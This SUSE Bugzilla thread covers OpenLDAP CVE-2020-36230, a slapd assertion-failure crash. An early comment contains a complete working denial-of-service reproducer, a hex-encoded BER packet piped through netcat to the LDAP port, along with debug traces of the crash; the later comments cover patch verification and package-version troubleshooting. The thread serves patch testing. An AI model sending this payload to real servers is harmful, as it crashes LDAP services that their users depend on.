Bugzilla – Bug 1182408
VUL-0: CVE-2020-36230: openldap2: Assertion failure in ber_next_element in decode.c
Last modified: 2022-05-06 07:26:01 UTC
rh#1921404 A flaw was discovered in OpenLDAP before 2.4.57 leading in an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service. https://bugs.openldap.org/show_bug.cgi?id=9423 https://git.openldap.org/openldap/openldap/-/commit/8c1d96ee36ed98b32cd0e28b7069c7b8ea09d793 https://git.openldap.org/openldap/openldap/-/tags/OPENLDAP_REL_ENG_2_4_57 References: https://bugzilla.redhat.com/show_bug.cgi?id=1921404 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-36230 https://www.debian.org/security/2021/dsa-4845 https://access.redhat.com/security/cve/CVE-2020-36230 http://www.debian.org/security/-1/dsa-4845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36230 https://lists.debian.org/debian-lts-announce/2021/02/msg00005.html https://bugs.openldap.org/show_bug.cgi?id=9423 https://git.openldap.org/openldap/openldap/-/tags/OPENLDAP_REL_ENG_2_4_57 https://git.openldap.org/openldap/openldap/-/commit/8c1d96ee36ed98b32cd0e28b7069c7b8ea09d793
I am testing openldap2 update SUSE:Maintenance:18481:236954, and following the link https://bugs.openldap.org/show_bug.cgi?id=9423#c0, I ran the command BEFORE and AFTER, I got the same failed slapd service: echo -en '\x30\x82\x01\xe4\x02\x04\x30\x30\x30\x30\x4a\x82\x01\x30\x4f\x3d\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xa7\xb2\xef\xbe\xb2\xef\xb6\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\x2c\x0a\x0a\x0a\x32\x2e\x35\x2e\x34\x2e\x33\x39\x3d\x30\x6b\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x06\x31\x30\xb0\x30\x30\x30\x18\x18\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x38\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x03\x03\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389 # systemctl status slapd.service ● slapd.service - OpenLDAP Server Daemon Loaded: loaded (/usr/lib/systemd/system/slapd.service; disabled; vendor preset: disabled) Active: failed (Result: signal) since Tue 2021-03-02 21:15:19 CST; 1s ago Process: 31803 ExecStart=/usr/lib/openldap/start (code=exited, status=0/SUCCESS) Main PID: 31815 (code=killed, signal=ABRT) Mar 02 21:15:14 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er> Mar 02 21:15:14 linux-zeaz slapd[31803]: @(#) $OpenLDAP: slapd 2.4.46 $ opensuse-buildservice@opensuse.org Mar 02 21:15:15 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er> Mar 02 21:15:15 linux-zeaz slapd[31815]: slapd starting Mar 02 21:15:15 linux-zeaz start[31803]: Starting ldap-server Mar 02 21:15:15 linux-zeaz systemd[1]: Started OpenLDAP Server Daemon. Mar 02 21:15:19 linux-zeaz slapd[31815]: conn=1000 fd=11 ACCEPT from IP=[::1]:39884 (IP=[::]:389) Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Main process exited, code=killed, status=6/ABRT Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Unit entered failed state. Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Failed with result 'signal'. is this expected ? this is a security update, I understand it a little hard.
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available. Category: security (important) Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420 CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212 JIRA References: Sources used: SUSE OpenStack Cloud Crowbar 9 (src): openldap2-2.4.41-18.83.1 SUSE OpenStack Cloud Crowbar 8 (src): openldap2-2.4.41-18.83.1 SUSE OpenStack Cloud 9 (src): openldap2-2.4.41-18.83.1 SUSE OpenStack Cloud 8 (src): openldap2-2.4.41-18.83.1 SUSE OpenStack Cloud 7 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Software Development Kit 12-SP5 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server for SAP 12-SP4 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server for SAP 12-SP3 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server for SAP 12-SP2 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP5 (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP4-LTSS (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP3-LTSS (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP3-BCL (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP2-LTSS (src): openldap2-2.4.41-18.83.1 SUSE Linux Enterprise Server 12-SP2-BCL (src): openldap2-2.4.41-18.83.1 HPE Helion Openstack 8 (src): openldap2-2.4.41-18.83.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available. Category: security (important) Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420 CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212 JIRA References: Sources used: SUSE Linux Enterprise Server for SAP 12-SP5 (src): openldap2-2.4.41-39.1 SUSE Linux Enterprise Server for SAP 12-SP4 (src): openldap2-2.4.41-39.1 SUSE Linux Enterprise Server for SAP 12-SP3 (src): openldap2-2.4.41-39.1 SUSE Linux Enterprise Server for SAP 12-SP2 (src): openldap2-2.4.41-39.1 SUSE Linux Enterprise Module for Legacy Software 12 (src): openldap2-2.4.41-39.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
I simply debuged this bug after update on SLES15SP1, and got the output: # /usr/lib/openldap/start ... Starting ldap-server+ exec /usr/sbin/slapd -d 3 -h 'ldap:/// ldapi:///' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=off ... 60408612 slap_listener_activate(8): 60408612 >>> slap_listener(ldap:///) 60408612 connection_get(13): got connid=1000 60408612 connection_read(13): checking for input on id=1000 ber_get_next ldap_read: want=8, got=8 0000: 30 82 01 e4 02 04 30 30 0.....00 ldap_read: want=480, got=480 0000: 30 30 4a 82 01 30 4f 3d ef be b2 ef be b2 ef be 00J..0O=........ 0010: b2 ef be b2 ef be b2 ef be b2 ef a7 b2 ef be b2 ................ 0020: ef b6 b2 ef be b2 ef be b2 ef be b2 ef be b2 ef ................ 0030: be b2 ef be b2 ef be b2 2c 0a 0a 0a 32 2e 35 2e ........,...2.5. 0040: 34 2e 33 39 3d 30 6b 30 30 30 06 30 30 30 30 30 4.39=0k000.00000 0050: 30 30 06 31 30 b0 30 30 30 18 18 30 30 30 30 30 00.10.000..00000 0060: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0070: 30 30 30 30 38 2e 30 30 30 30 30 30 30 30 30 30 00008.0000000000 0080: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0090: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00a0: 30 30 30 30 30 30 30 30 30 30 30 30 30 03 03 30 0000000000000..0 00b0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00c0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00d0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00e0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00f0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0100: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0110: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0120: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0130: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0140: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0150: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0160: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0170: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0180: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0190: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01a0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01b0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01c0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01d0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 ber_get_next: tag 0x30 len 484 contents: 60408612 op tag 0x4a, time 1614841362 ber_get_next ldap_read: want=8 error=Resource temporarily unavailable 60408612 conn=1000 op=0 do_delete ber_scanf fmt (m) ber: 60408612 <= get_ctrls: n=0 rc=0 err="" 60408612 >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ, 2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000> slapd: decode.c:686: ber_next_element: Assertion `last != NULL' failed. Aborted Does this mean that this bug is not fixed ?
It may not be. Perhaps there is an issue with the upstream patch. I will investigate early next week (I have another bug to investigate today :( )
(In reply to William Brown from comment #7) > It may not be. Perhaps there is an issue with the upstream patch. I will > investigate early next week (I have another bug to investigate today :( ) Glad to get your reply, and thank you. And I have another question. The reproduers (included this one) from the bugs in this update SUSE:Maintenance:18499:236986 always abort openldap service on SLES11SP4 BEFORE and AFTER update, if posibly, please help to investigate this issue. Thank you again.
I have been able to reproduce, I will attempt to investigate further.
Okay I think the issue is you may not have updated libldap. I hit the same issue on my system where libldap has the fix but it wasn't updated. Can you confirm the version of libldap you are using?
(In reply to William Brown from comment #10) > Okay I think the issue is you may not have updated libldap. I hit the same > issue on my system where libldap has the fix but it wasn't updated. > > Can you confirm the version of libldap you are using? Yes, you are right. I missed to update libldap: # rpm -qa | grep libldap libldap-2_4-2-32bit-2.4.46-9.48.1.x86_64 libldap-2_4-2-2.4.46-9.31.1.x86_64 libldapcpp1-0.3.1-1.33.x86_64 libldap-data-2.4.46-9.48.1.noarch and make sure this issue was fixed after updating libldap. thank you for your help. And could you know why the reproducers don't work on SLES11SP4 ?
As in, on sle11sp4 you can not cause the crash on the older version?
(In reply to William Brown from comment #12) > As in, on sle11sp4 you can not cause the crash on the older version? ON sles11sp4, openldap service crashed BEFORE and AFTER update. These reproducers can't work on sles11sp4 ?
(In reply to jun wang from comment #13) > (In reply to William Brown from comment #12) > > As in, on sle11sp4 you can not cause the crash on the older version? > > ON sles11sp4, openldap service crashed BEFORE and AFTER update. These > reproducers can't work on sles11sp4 ? I don't understand? You're saying it both crashed but also the reproducers can't work? What's going on? Again, have you checked libldap is updated?
(In reply to William Brown from comment #14) > > ON sles11sp4, openldap service crashed BEFORE and AFTER update. These > > reproducers can't work on sles11sp4 ? > > I don't understand? You're saying it both crashed but also the reproducers > can't work? What's going on? Again, have you checked libldap is updated? I mean that both(BEFORE and AFTER) crashed, reproducers shall work. Yes, I checked the version libldap, it was updated: libldap-2_4-2-2.4.26-0.74.22.1 this is the output on sles11sp4 after update, maybe it is useful for you. # exec /opt/suse/lib/openldap/slapd -h 'ldap:/// ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3 ... slapd starting slap_listener_activate(8): >>> slap_listener(ldap:///) connection_get(12): got connid=1000 connection_read(12): checking for input on id=1000 ber_get_next ldap_read: want=8, got=8 0000: 30 82 01 e4 02 04 30 30 0.....00 ldap_read: want=480, got=480 0000: 30 30 4a 82 01 30 4f 3d ef be b2 ef be b2 ef be 00J..0O=........ 0010: b2 ef be b2 ef be b2 ef be b2 ef a7 b2 ef be b2 ................ 0020: ef b6 b2 ef be b2 ef be b2 ef be b2 ef be b2 ef ................ 0030: be b2 ef be b2 ef be b2 2c 0a 0a 0a 32 2e 35 2e ........,...2.5. 0040: 34 2e 33 39 3d 30 6b 30 30 30 06 30 30 30 30 30 4.39=0k000.00000 0050: 30 30 06 31 30 b0 30 30 30 18 18 30 30 30 30 30 00.10.000..00000 0060: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0070: 30 30 30 30 38 2e 30 30 30 30 30 30 30 30 30 30 00008.0000000000 0080: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0090: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00a0: 30 30 30 30 30 30 30 30 30 30 30 30 30 03 03 30 0000000000000..0 00b0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00c0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00d0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00e0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00f0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0100: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0110: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0120: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0130: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0140: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0150: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0160: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0170: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0180: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 0190: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01a0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01b0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01c0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 01d0: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 ber_get_next: tag 0x30 len 484 contents: op tag 0x4a, time 1615176013 ber_get_next ldap_read: want=8 error=Resource temporarily unavailable conn=1000 op=0 do_delete ber_scanf fmt (m) ber: <= get_ctrls: n=0 rc=0 err="" >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ, 2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000> slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed.
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available. Category: security (important) Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420 CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212 JIRA References: Sources used: SUSE Manager Server 4.0 (src): openldap2-2.4.46-9.48.1 SUSE Manager Retail Branch Server 4.0 (src): openldap2-2.4.46-9.48.1 SUSE Manager Proxy 4.0 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Server for SAP 15-SP1 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Server for SAP 15 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Server 15-SP1-LTSS (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Server 15-SP1-BCL (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Server 15-LTSS (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Development Tools 15-SP3 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Development Tools 15-SP2 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Basesystem 15-SP3 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise Module for Basesystem 15-SP2 (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise High Performance Computing 15-LTSS (src): openldap2-2.4.46-9.48.1 SUSE Linux Enterprise High Performance Computing 15-ESPOS (src): openldap2-2.4.46-9.48.1 SUSE Enterprise Storage 6 (src): openldap2-2.4.46-9.48.1 SUSE CaaS Platform 4.0 (src): openldap2-2.4.46-9.48.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Hi William, I updated all new packages on SLES11SP4: # rpm -q compat-libldap-2_3-0 libldap-2_4-2 libldap-2_4-2-32bit libldap-openssl1-2_4-2 libldap-openssl1-2_4-2-32bit libldap-openssl1-2_4-2-x86 openldap2 openldap2-back-meta openldap2-client openldap2-client-openssl1 openldap2-openssl1 compat-libldap-2_3-0-2.3.37-2.74.22.1 libldap-2_4-2-2.4.26-0.74.22.1 libldap-2_4-2-32bit-2.4.26-0.74.22.1 libldap-openssl1-2_4-2-2.4.26-0.74.22.1 libldap-openssl1-2_4-2-32bit-2.4.26-0.74.22.1 package libldap-openssl1-2_4-2-x86 is not installed openldap2-2.4.26-0.74.22.1 openldap2-back-meta-2.4.26-0.74.22.1 openldap2-client-2.4.26-0.74.22.1 openldap2-client-openssl1-2.4.26-0.74.22.1 openldap2-openssl1-2.4.26-0.74.22.1 # ldd /usr/lib/openldap/slapd linux-vdso.so.1 => (0x00007ffd93ea6000) libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007f66123df000) liblber-2.4.so.2 => /usr/lib64/liblber-2.4.so.2 (0x00007f66121d0000) libltdl.so.7 => /usr/lib64/libltdl.so.7 (0x00007f6611fc6000) libdb-4.5.so => /usr/lib64/libdb-4.5.so (0x00007f6611c8e000) libslp.so.1 => /usr/lib64/libslp.so.1 (0x00007f6611a75000) libm.so.6 => /lib64/libm.so.6 (0x00007f66117fa000) libnsl.so.1 => /lib64/libnsl.so.1 (0x00007f66115e2000) libsasl2.so.2 => /usr/lib64/libsasl2.so.2 (0x00007f66113c7000) libdl.so.2 => /lib64/libdl.so.2 (0x00007f66111c3000) libssl.so.0.9.8 => /usr/lib64/libssl.so.0.9.8 (0x00007f6610f6b000) libcrypto.so.0.9.8 => /usr/lib64/libcrypto.so.0.9.8 (0x00007f6610bc8000) libcrypt.so.1 => /lib64/libcrypt.so.1 (0x00007f661098d000) libresolv.so.2 => /lib64/libresolv.so.2 (0x00007f6610776000) libwrap.so.0 => /lib64/libwrap.so.0 (0x00007f661056b000) libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f661034e000) libc.so.6 => /lib64/libc.so.6 (0x00007f660ffd2000) /lib64/ld-linux-x86-64.so.2 (0x00007f66128bf000) libz.so.1 => /lib64/libz.so.1 (0x00007f660fdbc000) # rpm -qf /usr/lib64/libldap_r-2.4.so.2 libldap-2_4-2-2.4.26-0.74.22.1 but openldap service still crashed with the reproducer from this bug: (reproducer from https://bugs.openldap.org/show_bug.cgi?id=9423) # exec /usr/lib/openldap/slapd -h 'ldap:/// ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3 2>&1 | tee openldap2.log ... 2.5.4.39=0k00000000001000000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000> slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed. only bug#1182408 and bug#1182411 still crashed after updating all new packages, and make sure the other bugs were fixed. please login "homer" to check this issue.
Sorry, my key is no longer on this system. I can't login. Can you re-add it?
(In reply to William Brown from comment #23) > Sorry, my key is no longer on this system. I can't login. Can you re-add it? I added your key into the remote host, please have a try.
homer:~ # rpm -q --changelog libldap-2_4-2 | less homer:~ # It's still the wrong version of the package. Changelog here shows this build is from june 2020, not feb 2021.
Now I'm even more confused. In sle 11 sp4 this should be based on openldap 2.3, not 2.4. How did you get 2.4 packages on there? I think this is an IBS problem, not a packaging one at this point sorry.
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available. Category: security (important) Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420 CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212 JIRA References: Sources used: openSUSE Leap 15.2 (src): openldap2-2.4.46-lp152.14.18.1
# ldd /usr/lib/openldap/slapd linux-vdso.so.1 => (0x00007ffc49353000) libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007fed217f6000) # ll /usr/lib64/libldap_r-2.4.so.2.7.1 -rwxr-xr-x 1 root root 323304 Mar 2 02:25 /usr/lib64/libldap_r-2.4.so.2.7.1 # ll /usr/lib64/libldap-2.4.so.2.7.1 -rwxr-xr-x 1 root root 298120 Mar 2 02:25 /usr/lib64/libldap-2.4.so.2.7.1 look the above output, there are two ldap libraries libldap-2.4.so.2.7.1 and libldap_r-2.4.so.2.7.1, slapd is using libldap_r-2.4.so.2.7.1, is it possible that slapd should use the library libldap-2.4.so.2.7.1 ?
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available. Category: security (important) Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020 CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212 JIRA References: Sources used: SUSE Linux Enterprise Server 11-SP4-LTSS (src): openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1 SUSE Linux Enterprise Server 11-SECURITY (src): openldap2-client-openssl1-2.4.26-0.74.26.1 SUSE Linux Enterprise Point of Sale 11-SP3 (src): openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
released